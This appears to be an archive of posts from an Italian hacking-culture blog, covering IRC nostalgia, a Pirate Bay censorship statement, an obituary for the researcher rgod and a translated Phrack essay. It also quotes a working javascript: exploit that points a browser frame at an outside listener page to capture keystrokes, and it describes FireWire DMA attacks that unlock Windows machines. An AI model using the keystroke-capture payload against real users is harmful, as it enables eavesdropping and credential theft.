Da un pò di tempo sto guardando al mondo dell’hacking da un punto di vista prettamente sociale. Se qualche anno fa il termine hacker assumeva il significato di “cultore di materia” o di “curioso appassionato” oggi non è più propriamente vero. Il progetto HPP tenta di creare un pò d’ordine, facendo spuntare altri termini e definendo in maniera assoluta (come se ce ne fosse bisogno) la figura dell’ “Ethical Hacker“.

E che centra Uplink?

Beh avete presente quando ripensate al passato? Ad un evento abbastanza indietro nel tempo tale da farvi tornare alla mente cose che credevate dimenticate?! Uplink è stato il mio “gateway”.

Mi ricordo di quando ero ancora uno script kiddie e il mio pane quotidiano erano IRCnet, EfNET e hack.co.za, anzi hack.co.za txt version. Quando avevo una connessione analogica a 33.6 con un ISP di Cupramarittima (non Jonhatan di SBT) ed utilizzavo il mio fidato US Robotics V.92 (di cui abbiamo una diapositiva)

Mi tornano alla mente le IRCWar, i Takeover, gli split channel, le Connection reset by peer e il manipolo di disadattati lasciati in quel di #sbt e non solo.

Memorabili gli ls -l con lag di 20sec o i .kick #channel TizioCaio 0 tollerance! o ancora le minacce dalla serie “ti takko il chan” oppure “Chiamo un IRCop e ti faccio mettere una K-Line” … Spettacolo!

Dopo tanti anni giocare ad Uplink sembra quasi come tornare indietro nel tempo…

…che back in time e pensare che ne sono passati “solo” 11 di anni! Sigh!

E’ strano razionalizzare in concreto il cambiamento!

This time it’s Italy. They suffer from a really bad background as one of the IFPIs was formed in Italy during the fascist years and now they have a fascist leader in the country, Silvio Berlusconi. Berlusconi is also the most powerful person in Italian media owning a lot of companies that compete with The Pirate Bay and he would like to stay that way - so one of his lackeys, Giancarlo Mancusi, ordered a shutdown of our domain name and IP in Italy to make it hard to not support Berlusconis empire.

We have had fights previously in Italy, recently with our successful art installation where we had to storm Fortezza in order to get our art done. And as usual, we won. We will also win this time.

We have already changed IP for the website - that makes it work for half the ISPs again. And we want you all to inform your italian friends to switch their DNS to OpenDNS so they can bypass their ISPs filters. This will also let them bypass the other filters installed by the Italian government, as a bonus. And for the meanwhile - http://labaia.org works (La Baia means The Bay in Italian).

And please, everybody should also contact their ISP and tell them that this is not OK and that the ISPs should appeal. We don’t want a censored internet! And the war starts here…

The Pirate Bay - Il più vasto tracker di BitTorrent al mondo.

Che bella immagine che diamo di noi veramente stupenda!

I am not rgod. I’m a friend of his named Daniel.rgod died two days ago at that hospital in Catania. It was a surprise and a shock…to all of us who knew him. rgod was suffering of a rare bony marrow

disease, leading to paralysis during his last days.It just took me a while to figure out how to have access to rgod’s website, searching the key on his laptop

(with permission from those close to him) to post this…I don’t know what the future of this site will involve but I’d sure like to see these posts, and some of the

others about rgod posted across the Internet, preserved on the web indefinitely. Just so that when folks google the name of rgod in years to come, they’ll be able to read it all.

rgod web pages

Ieri rileggevo un mio vecchio post e tra i commenti ho scorto la firma di rgod.

Da tempo non andavo sul suo “sito” e come sempre mi sono detto “andiamo a vedere cosa quel diavolaccio ha combinato negli ultimi tempi”.

Una volta lì, ho appreso della sua scomparsa … come solo ed unico commento posso dire che …

… oggi non è un bel giorno per me!

Anche se non ti ho mai conosciuto personalmente … rest in peace my friend!

edit:

Il generale rappresenta la conoscenza, la fedeltà, il coraggio e la severità.
by Sun Tzu

Non sei stato mai un uomo da palcoscenico le tue azioni parlano da sole, ma per molti sei stato più che un generale… ancora non ci posso credere!

This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this:

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return ‘http://www.sirdarckcat.net/caballero-listener.html’;}}}catch(e){}},5000);void(1);

What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode.

Ghost Busters | GNUCITIZEN

Vi fornisco direttamente il digest

Shared by Andrea Lazzari

E all’ex ministro Visco hanno fatto storie per i redditi del 2005? Chissà se fosse successo in Italia come avrebbero reagito le istituzioni visto che per la vicenda Telecom nessuno ha detto o fatto niente

A hacker has posted the personal details of more than a third of Chile’s population on the internet, including what is thought to be information about the president’s daughter, a Chilean newspaper has reported.

Personal data, including the identity card numbers, addresses, telephone numbers, emails and academic background of 6 million Chileans was posted on the internet on Friday, according to the El Mercurio newspaper.

The information was posted by someone who hacked into servers at the education ministry, the electoral service and the military, according to the paper.

[Via - Andrea Lazzari's shared items in Google Reader]

Leggevo uno dei molti feed che seguo¹ in questi giorni e mi sono imbattuto in questo simpatico “giochino”

C’è chi gioca a “trova le differenze”, chi a sudoku e chi semplicemente non fa niente.

Bene vorrei sfidarvi a trova la passphrase

Unici tool di cui avete bisogno:

• Il PDF da crackare
• Notepad o il vostro editor di testo preferito
• Un minimo di skill

Buon divertimento

UPDATE: Qui il link dove prendere altre info

1. Lo citerò solo quando avrete trovato la soluzione [↩]

Leggevo Vecna e sono rimasto molto colpito dalla spietata freddezza con cui si rivolge al panorama underground, con un pizzico di veleno per quello italiano.

Amarezza che non posso non condividere.

Mi permetto di tradurre (in forma libera) parte dell’articolo The Underground Myth apparso su Phrack issues 65

Questa è un’affermazione su quello che è il destino dell’underground moderno.

Non ci sarà nessuna nostalgia, nessun melodramma, niente “retorica blackhat” o “sovranalisi whitehat” accompagnatori tipici di articoli come questo.

Fin dai primi ‘60 c’è stata una continuità nell’hacking. Dai phreacker agli hacker, persone andavano e venivano con un’esplosione di attività con vari ascendenti di natura geografica.

Tuttavia seppur tale scena sembrava continuamente ridefinire se stessa, secondo la marea e i flussi della tecnologia, ha sempre mantenuto una linea con il passato con la stessa tradizione, cultura e spirito di sempre

Negli ultimi tempi questa connessione è stata completamente spezzata.

Ha veramente poco senso ora scrivere di quello che l’underground è stato, lascio il compito agli storici. Ha ancor meno senso scrivere sul cosa si dovrebbe fare per riavere “le cose com’erano”, lasciamo il compito ai sognatori e agli idealisti.

Invece vorrei mettere sul tavolo alcune fredde e dure realtà di come stanno le cose ora e, più importante, di quello che ci aspetta.

Questa è la storia di come l’underground è morto … segue

Parlavo qualche in qualche post qui sotto del fantastico mondo degli attacchi fisici alla macchine e dei dump della memoria ram

Mi lamento sempre di quanto la mia testa faccia cilecca ma dalla serie “il cervello non smette mai di lavorare” con un tempo computazionale di 17 giorni ecco il risultato

Firewire port == owned.

I read about Max Dornseif’s work on doing memory forensics (and bad things) using the physical-memory-DMA feature of Firewire earlier this year. Being curious, I implemented my own stack of tools to try it out against my Linux laptop (before I knew that Max’s OSX python-firewire bindings had been ported to Linux!). It worked just like Max said, and of course, because physical-memory-DMA-busmastering is the Fire in Firewire.

However, despite working fine against Linux, Macs and BSD boxen, it didn’t work against Windows. My colleague Tmasky set to it, and soon enough had found the miracle ingredient.

Skip forward a few months, and it’s now a big deal for reasons I’m not wholly sure about. I presented “Hit By A Bus: Physical Access Attacks With Firewire” at Ruxcon 2006, and hopefully if you came along, you were entertained.

At Ruxcon I released my firewire libraries (high level python bindings for libraw1394), the tool for fooling windows into giving you DMA (romtool), and a forensic memory imager (1394memimage). I demoed some of the malicious uses (like unlocking a locked Win XPSP2 workstation, and spawning an admin shell), but I’m not going to release that code (uh, unless you’ve got a compelling reason, I suppose). The talk and the tools are available just below.

[Via www.storm.net.nz Projects]

Chi la dura la vince

* Yes, you can read and write main memory over firewire on windows.
* Yes, this means you can completely own any box who’s firewire port you can plug into in seconds.
* Yes, it requires physical access. People with physical access win in lots of ways. Sure, this is fast and easy, but it’s just one of many.
* Yes, it’s a FEATURE, not a bug. It’s the Fire in Firewire. Yes, I know this, Microsoft know this. The OHCI-1394 spec knows this. People with firewire ports generally dont.